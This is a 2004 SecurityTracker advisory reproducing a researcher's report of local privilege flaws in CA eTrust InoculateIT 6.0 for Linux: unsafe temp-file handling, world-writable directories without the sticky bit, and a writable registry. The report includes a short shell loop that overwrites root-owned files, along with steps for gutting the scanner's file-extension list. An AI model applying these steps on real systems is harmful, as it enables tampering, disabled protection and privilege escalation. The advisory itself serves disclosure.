SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   InoculateIT Vendors:   CA
CA eTrust InoculateIT Default Linux Permissions May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1008993
SecurityTracker URL:  http://securitytracker.com/id/1008993
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 10 2004
Impact:   Denial of service via local system, Modification of system information, Modification of user information, User access via local system
Exploit Included:  Yes  
Version(s): 6.0
Description:   A vulnerability was reported in CA's eTrust InoculateIT anti-virus software for Linux. A local user may be able to gain elevated privileges on the target system.

l0om from excluded.org reported several flaws due to the file permissions on the Linux-based installation.

It is reported that some scripts use temporary files in an unsafe manner. A local user can create a symbolic link (symlink) from a critical file on the system to a temporary file to be used by the application. Then, when the affected application component runs, the symlinked file may be overwritten with the privileges of the application component.

The 'ino/scripts/inoregupdate', 'scripts/uniftest', and 'scripts/unimove' files manipulate temporary files in a world writable temporary directory, the report said.

It is also reported that some directories in the 'tmp' directory do not have the stick bit set, allowing a local user to overwrite some critical files contained in those directories. The '.file', '.nob_event', '.nob_mutex', '.nob_sem', '.sem', and '.shm' directories are affected, according to the report.

It is also reported that the 'registry' directory is world-writable. In some cases, a local user may be able to change potentially sensitive values in the registry. For example, a local user can modify the 'registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list' key to change the file extensions that the anti-virus software will check.

Impact:   A local user may be able to overwrite critical files on the system to change the operation of the product or potentially gain elevated privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  support.ca.com/inocitsupp.html (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  [local problems] eTrust Virus Protection 6.0 InoculateIT for linux




author: l0om  <l0om@excluded.org> 
software: eTrust Virus Protection 6.0 InoculateIT for 
linux 
 
local phun with etrust antivirus 6.0 inoculateIT 
linux 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
eTrust InnoculateIT 6.0 comes for the following OSes: 
-windows 95/98/ME 
-windows nt 4.0/2000 
-novell netware 3.x 4.x 5.x 
-lotus notes/domino 
-mircosoft exchange server 
-and finally linux (SuSE, RedHat, Caldera, Turbo 
Linux) 
 
eTrust is a antivirus program which can scan nearly 
every fileformat 
for viruses. i have installed the version for linux 
on my SuSE 9.0 system 
and noticed the following security flaws: 
 
 
1) possible symlink attacks in some scripts 
 
  by the way- the env variable $CAIGLBL0000 can be /
usr/local/eTrust/ for example. 
  however - the $CAIGLGL0000/tmp IS world writable... 
 
ino/scripts/inoregupdate 
######################## 
[...] 
tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ 
$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn 
[...] 
 
 
scripts/uniftest 
################ 
local=$CAIGLBL0000/tmp 
local1=$CAIGLBL0000/scripts 
[...] 
    $CAIGLBL0000/bin/unips > $local/unips.$$ 
    awk -f $local1/uniftest.awk $local/unips.$$ 
    st_rc=$? 
    rm $local/unips.$$ 
[...] 
 
scripts/unimove 
############### 
           sed -e "s!$from!$to!g" $fn > /
tmp/.unimove.sed #<-- creats it now 
           diff $fn /tmp/.unimove.sed > /dev/null 
           if [ $? != 0 -a -s /tmp/.unimove.sed ]; 
then 
                mv /tmp/.unimove.sed  $fn 
           rm /tmp/.unimove.sed    # dels it if 
finished 
 
 
2) some directorys in /tmp dont have the sticky bit 
set 
an example: 
 
eTrustAE.lnx/tmp/.caipcs/ # ls -l 
drwxrwxrwx    8 root     root          240 2004-02-05 
09:58 . 
drwxrwxrwx    4 root     root          160 2004-02-09 
16:53 .. 
drwxrwxrwx    2 root     root           48 2004-02-05 
09:54 .file 
-rw-r--r--    1 root     root         4110 2004-02-05 
09:58 ipcrm.log 
drwxrwxrwx    2 root     root          856 2004-02-05 
10:48 .nob_event 
drwxrwxrwx    2 root     root         1168 2004-02-05 
10:48 .nob_mutex 
drwxrwxrwx    2 root     root           48 2004-02-05 
09:54 .nob_sem 
drwxrwxrwx    2 root     root          384 2004-02-05 
10:48 .sem 
drwxrwxrwx    2 root     root           80 2004-02-05 
10:48 .shm 
 
eTrustAE.lnx/tmp/.caipcs # ls -l .sem 
drwxrwxrwx    2 root     root          384 2004-02-05 
10:48 . 
drwxrwxrwx    8 root     root          240 2004-02-05 
09:58 .. 
-rw-------    1 root     root           20 2004-02-05 
10:01 3571729 
-rw-------    1 root     root            5 2004-02-05 
09:58 3702805 
-rw-------    1 root     root           25 2004-02-05 
10:01 3735574 
-rw-------    1 root     root           25 2004-02-05 
10:01 3768343 
-rw-------    1 root     root           15 2004-02-05 
09:58 3801112 
 
this directory includes values which are kinda 
sensetive. so only root can 
read or write them as we can see at this 
filepermissions. 
but as the upper directory /.sem has no sticky bit 
set and is world writeable. 
we can simple overwrite these files as the directory 
permissions are of a 
higher priority as the file permissions. this is the 
truth for a handful of 
directorys. 
for example: 
 
badass~:> phun() 
{ 
for i in `ls /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem`; do 
cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/
tmp/.caipcs/.sem/$i 
done 
echo jupp 
} 
badass~:> phun 
jupp 
badass~:> 
 
 
3) world writeable 
 
with the linux version of etrust there come some 
directroys which we all know- the 
"registry". it seems like the whole registry key is 
world writeable: 
 
>find ./ -type f -perm -2 -print 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
macro_cure_action 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
scan_files 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
log_infected_files 
./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list 
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/home 
./registry/hkey_local_machine/software/
computerassociates/scanengine/path/logs 
[...] 
 
they got the sticky bit set, therefore we cannot 
overwrite or delte them, but sometimes we can 
change sensetive values in the registry. for example: 
 
cat ./registry/hkey_current_user/software/
computerassociates/inoculateit/6.0/local_scanner/
specified_list 
|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|
386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|
POT| 
PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|
PIF|BAT| 
 
this key contains a list of fileends which specifies 
what files should be scaned for a virus. 
a normal user can simply delte all values except one 
from this list, and can make the scanner pretty 
lame... 
furthermore there are worldwritable keys like 
"windows/currentversion", with keys which include the 
path to 
the normal binarys ("/usr/bin"). it may be possible 
to execute whatever you want on a reboot if you 
change 
the right keys in the right way. 
 
 
 
have phun! 
	feel phree! 
		life phat! 
 
YaCP - (Y)ast (a)nother (C)yber(P)unk 
 
--l0om 
--www.excluded.org 
 
 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC